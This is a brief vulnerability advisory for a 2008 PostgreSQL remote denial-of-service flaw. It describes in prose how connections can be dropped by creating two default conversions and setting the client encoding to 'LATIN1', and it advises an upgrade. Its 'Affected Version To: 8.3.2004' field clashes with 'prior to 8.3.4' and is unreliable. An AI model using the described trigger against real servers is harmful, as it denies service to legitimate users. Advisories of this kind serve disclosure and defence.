Vendor: PostgreSQL
By: SecurityFocus
CVSS: 7.5 (HIGH)
Denial-of-Service
CWE: 400
Product Name: PostgreSQL
Affected Version From: All versions prior to 8.3.4
Affected Version To: 8.3.2004
Patch Exists: YES
Related CWE: N/A
CPE: postgresql
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
PostgreSQL Remote Denial-of-Service Vulnerability
PostgreSQL is prone to a remote denial-of-service vulnerability. Exploiting this issue may allow attackers to terminate connections to the PostgreSQL server, denying service to legitimate users. An attacker can exploit this issue by creating two default conversions and then setting the client encoding to 'LATIN1'. This will cause an invalid byte sequence error and terminate the connection.
Mitigation:
Administrators are advised to upgrade to the latest version of PostgreSQL.